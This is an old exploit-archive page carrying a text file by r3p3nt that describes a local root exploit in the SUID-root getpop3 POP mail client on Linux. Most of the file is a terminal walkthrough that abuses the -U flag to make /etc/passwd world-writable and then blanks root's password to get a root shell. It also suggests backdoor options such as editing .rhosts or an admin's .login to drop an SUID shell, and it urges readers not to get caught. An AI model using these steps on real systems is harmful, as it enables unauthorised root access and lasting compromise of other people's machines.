exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

getpop3.txt

getpop3.txt
Posted Mar 2, 2000
Authored by r3p3nt | Site dhc1.cjb.net

Getpop3 POP client for linux local root exploit - make any local file world writable.

tags | exploit, local, root
systems | linux
SHA-256 | 7719521455848e7d654262495d9a48609860cc59ad1edd33a49d56c3bb2d61d2

getpop3.txt

Change Mirror Download
########################################
#what?: [=-getpop3 exploit-=] #
#who?: [- by r3p3nt of the DHC -] #
#where?: [- http://dhc1.cjb.net -] #
#contact?: [- tdefiance@hotmail.com #
########################################
greets: all of DHC, duke, f0rpaxe, artech, and eli (up for some raceball?)
thanks: jwb

tdefiance@hotmail.com

You are wondering "hmm..what is getpop3, mister r3p3nt". Well, getpop3 is a
POP mail client for linux (no, not that stuff in Chex mix). This exploit has
been known by me for a very long time..so I might as well release it now.
This exploit was found when someone (he will go unnamed because I don't want
Joel to look like a fool) said his linux box was 'secure, no one can hack
it'. After some fumbling around on his box...root access was obtained.
The hole? Getpop3. Getpop3 is installed SUID root. If you dont know what
SUID
root is..don't use this exploit@!$ When getpop3 is fed the -U parameter it
sets
a file world writable. If you are a goon..here is how this could be good:

lamebox:~$ id
uid=1000(elf) gid=100(users) groups=100(users)
lamebox:~$ cp /etc/passwd /tmp/backup
lamebox:~$ getpop3 -V
getpop3 1.08 Copyright 1997 Double Precision, Inc.

lamebox:~$ getpop3 -U /etc/passwd
enter userid: elf
enter password: mypassword
enter host:poopy.reallame666.com
querying poopy.reallame666.com
+OK poopy.reallame666.com POP3 server (Netscape Mail Server v2.02) ready
Fri, 1
>USER elf
+OK Password required for elf
>PASS password
+OK elf's mailbox has 0 messages (0 octets)
>STAT
+OK 0 0
>QUIT
+OK poopy.reallame666.com POP3 server closing connection

*************************************************************
Whoo hooo! Now /etc/passwd is world writable..the fun begins*
Remember the file we backed up? *
*************************************************************

lamebox:~$ cat /tmp/backup > /etc/passwd

***********************************************************************
now edit the passwd file so you are 0:0 ...like so: *
root:x:0:0:super admin,,,:/root:/bin/bash <-- whats in the /etc/passwd*
root::0:0:your daddy,,,:/root/:bin/bash <-- what you change it to *
Now log on as root!@# *
If you didn't fuck anything up you should be dropped to a root shell, *
and not asked for a password. *
Don't wanna overwrite /etc/passwd? Then use .rhosts .Hell, you could *
even edit the admins .login ...and make it so when the logs in he/she *
tosses an SUID root shell in /tmp *
Be creative in what you do, and don't get caught! *
***********************************************************************

*************FIX*********************************************
* I havn't noticed the hole in the newer versions. Upgrade. *
*************************************************************
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close